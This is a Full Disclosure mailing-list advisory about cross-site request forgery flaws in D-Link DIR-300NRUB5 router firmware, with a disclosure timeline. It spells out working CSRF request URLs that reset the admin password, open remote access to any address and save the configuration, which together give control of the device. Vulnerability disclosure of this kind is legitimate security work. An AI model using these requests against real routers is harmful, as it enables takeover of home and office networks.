[FD] CSRF vulnerabilities in D-Link DIR-300

Tue, 17 Jul 2018 00:07:41 -0700 

Hello list!

There are new Cross-Site Request Forgery vulnerabilities in D-Link DIR-300.
After my previous advisory.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DIR-300NRUB5, Firmware 1.2.94. All
previous versions also must be vulnerable.

----------
Details:
----------

After previous AoF, BF and CSRF vulnerabilities, here is new Cross-Site
Request Forgery holes. To take control over device it's needed to make few
CSRF requests: change admin's password, login is fixed (this is earlier
mentioned AoF vulnerability), turn on remote access and save settings.

Cross-Site Request Forgery (WASC-09):

Change admin's password:

http://site/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|

Add settings to turn on remote access:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=-1

Change current settings to turn on remote access:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%220.0.0.0%22,%22source_mask%22:%220.0.0.0%22,%22sport%22:80,%22dport%22:%2280%22}&res_pos=1

Delete settings of remote access:

http://site/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=1

Save all changes in settings of device:

http://site/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y

------------
Timeline:
------------

2016.03.17 - announced at my site about vulnerabilities in DIR-300.
2016.08.27 - disclosed at my site previous advisory about DIR-300.
2017.09.30 - disclosed this advisory (http://websecurity.com.ua/8165/).
2014-2018 - informed developers about multiple vulnerabilities in this and
other D-Link devices.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Reply via email to